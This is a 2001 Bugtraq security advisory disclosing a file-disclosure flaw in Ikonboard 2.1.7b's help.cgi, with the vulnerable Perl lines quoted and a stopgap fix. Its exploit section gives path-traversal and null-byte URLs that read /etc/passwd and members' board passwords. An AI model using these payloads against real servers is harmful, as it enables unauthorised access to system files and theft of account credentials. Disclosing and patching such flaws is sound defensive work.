Bugtraq mailing list archives
Ikonboard v2.1.7b "show files" vulnerability
From: "Martin J. Muench" <muench () GMC-ONLINE DE>
Date: Sun, 11 Mar 2001 18:43:09 +0100
-[ Product: Ikonboard -[ Version: 2.1.7b -[ OS: Unix, NT -[ Vendor: Notified, http://www.ikonboard.com -=[ Summary ]=- This is another bug in the Ikonboard. Anyone can read any file on the remote system with the privileges of the web server. -=[ Problem ]=- File: help.cgi ---[L.44]--- $inhelpon = $query -> param('helpon'); --- As we can see, $inhelpon is the input for 'helpon' ---[L.95-97]--- $filetoopen = "$ikondir" . "help/$inhelpon.dat"; $filetoopen = &stripMETA($filetoopen); open (FILE, "$filetoopen") or die "Cannot locate the required files"; --- Well, it sets the file, runs it through the filter and opens it. -> $inhelpon, remember?! ;) Ok, i am not going to post the whole filter it uses because they really have been able to write a filter that is 24 lines long. And they finally forgot to filter the backslash, so we can easily just attach the 'poison null-byte' to '$inhelpon' and we escape the '.dat'. And of course the scripts doesn't check for "..", so we can specifiy every path we want. -=[ Exploit ]=- Example: http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 - would show the password file, if it is readable with the privileges of the web server. http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00 - replace <member> with the member name and it shows you his/her board-password. (works with Administrator accounts too) -=[ Patches ]=- Not yet available. You could fix the script temporary by inserting the following line under line 45 in 'help.cgi': $inhelpon =~ s/\///g; This is lame, but it works. -=[ Greetings ]=- Neilk - learned alot from you! Marc Ruef - I promised it ;) DukeCS - thanks for everything! Marko - thanks for your help! Tribunal - you taught me alot, thanks ICB - long time no speak Svoern - "go get 'em" ;) So long, Martin J. Muench <muench () gmc-online de> http://mjm.gmc-online.de http://www.german-secure.de "Perl - The only language that looks the same before and after RSA encryption." - Keith Bostic
Current thread:
- Ikonboard v2.1.7b "show files" vulnerability Martin J. Muench (Mar 12)
- Re: Ikonboard v2.1.7b "show files" vulnerability Darren Mobley (Mar 12)